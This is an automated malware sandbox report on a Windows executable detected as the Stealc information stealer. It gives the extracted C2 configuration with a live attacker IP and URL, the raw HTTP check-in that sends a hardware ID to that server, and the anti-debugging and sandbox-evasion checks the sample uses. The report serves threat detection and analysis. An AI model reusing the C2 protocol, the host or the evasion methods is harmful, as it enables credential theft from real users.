Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541160
MD5: efb3596cf052ae112e2b81b16870436e
SHA1: 266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
SHA256: 73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EFB3596CF052AE112E2B81B16870436E)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7264 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7264 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.910000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T14:18:02.241179+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.910000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG Host: 185.215.113.37 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBG Content-Disposition: form-data; name="hwid" 6977C7B1D24A563484146 ------EBAFBGIDHCBFHIECFCBG Content-Disposition: form-data; name="build" doma ------EBAFBGIDHCBFHIECFCBG--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG Host: 185.215.113.37 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBG Content-Disposition: form-data; name="hwid" 6977C7B1D24A563484146 ------EBAFBGIDHCBFHIECFCBG Content-Disposition: form-data; name="build" doma ------EBAFBGIDHCBFHIECFCBG--
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/0
Source: file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/G
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C260C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDD9A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C936
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDF96C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB397A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C60115
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A927
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE4AAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B94BE1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6248D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA476
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA8D08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE0E93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5EEA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8860C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF3E4A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C10F57
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDBF1E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009145C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: enilkfvu ZLIB complexity 0.9950591473636087
Source: file.exe, 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VQR1X6ZM.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1836032 > 1048576
Source: file.exe | Static PE information: Raw size of enilkfvu is bigger than: 0x100000 < 0x19a200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;enilkfvu:EW;cjtkqast:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c2667 should be: 0x1c4d05
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: enilkfvu
Source: file.exe | Static PE information: section name: cjtkqast
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C260C7 push 0108C592h; mov dword ptr [esp], esi | 0_2_00C26316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCE8D9 push esi; mov dword ptr [esp], ebx | 0_2_00DCE90F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC18C4 push eax; mov dword ptr [esp], ecx | 0_2_00DC18DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3090 push esi; mov dword ptr [esp], ebx | 0_2_00BE3180
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3090 push edi; mov dword ptr [esp], esi | 0_2_00BE3184
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE3090 push ebp; mov dword ptr [esp], ecx | 0_2_00BE31B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9D848 push ebp; mov dword ptr [esp], 53967580h | 0_2_00D9D8A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092B035 push ecx; ret | 0_2_0092B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCB06C push 52FB224Ch; mov dword ptr [esp], edx | 0_2_00DCB0DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DFD03D push esi; mov dword ptr [esp], 1F9A9466h | 0_2_00DFD0DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7683E push ecx; mov dword ptr [esp], edx | 0_2_00D7686F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEB02D push 192B211Ch; mov dword ptr [esp], ecx | 0_2_00DEB03F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEB02D push ebx; mov dword ptr [esp], ebp | 0_2_00DEB17E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEB02D push eax; mov dword ptr [esp], esi | 0_2_00DEB1B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEB02D push 7B17890Dh; mov dword ptr [esp], eax | 0_2_00DEB1E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEB02D push esi; mov dword ptr [esp], esp | 0_2_00DEB1E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D78021 push edi; mov dword ptr [esp], esp | 0_2_00D7807A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D78021 push 435E7A54h; mov dword ptr [esp], ecx | 0_2_00D7813B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D78021 push edi; mov dword ptr [esp], edx | 0_2_00D7817D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEC1C8 push 12D63B6Ah; mov dword ptr [esp], edi | 0_2_00CEC1F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEC1C8 push 5765917Fh; mov dword ptr [esp], esi | 0_2_00CEC275
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEA9D5 push ebx; mov dword ptr [esp], ecx | 0_2_00DEAA1A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push 24F38F98h; mov dword ptr [esp], ebp | 0_2_00CE29FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push ecx; mov dword ptr [esp], 377D5128h | 0_2_00CE2A01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edi | 0_2_00CE2A89
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], ebx | 0_2_00CE2B27
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push 0B20A511h; mov dword ptr [esp], esi | 0_2_00CE2B68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push esi; mov dword ptr [esp], edx | 0_2_00CE2C02
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push 2DA0F3D7h; mov dword ptr [esp], eax | 0_2_00CE2C86
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push 5F6B3B2Dh; mov dword ptr [esp], esi | 0_2_00CE2CA6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE29D8 push 662C787Ah; mov dword ptr [esp], edx | 0_2_00CE2CE1
Source: file.exe | Static PE information: section name: enilkfvu entropy: 7.954611061577171

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDD530 second address: CDD534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDD534 second address: CDD547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jno 00007F1674F90E16h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDD547 second address: CDD564 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DACh 0x00000008 pushad 0x00000009 jl 00007F1675279DA6h 0x0000000f jns 00007F1675279DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEBFBE second address: CEBFC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEBFC4 second address: CEBFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEBFCA second address: CEBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC173 second address: CEC185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEC185 second address: CEC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEAFB second address: CEEB0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEB0F second address: CEEB7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 35D15B89h 0x00000010 mov dword ptr [ebp+122D347Ch], esi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1674F90E18h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 add ecx, 2D153BBAh 0x00000038 movzx ecx, bx 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D1963h], ebx 0x00000043 push 00000003h 0x00000045 jl 00007F1674F90E1Ch 0x0000004b mov dword ptr [ebp+122D1904h], ecx 0x00000051 push E3AD49C1h 0x00000056 js 00007F1674F90E20h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEC2B second address: CEEC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1675279DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEC35 second address: CEEC96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F1674F90E18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov si, 87F0h 0x0000002c push 00000000h 0x0000002e jmp 00007F1674F90E25h 0x00000033 push C52C45DCh 0x00000038 pushad 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEC96 second address: CEEC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
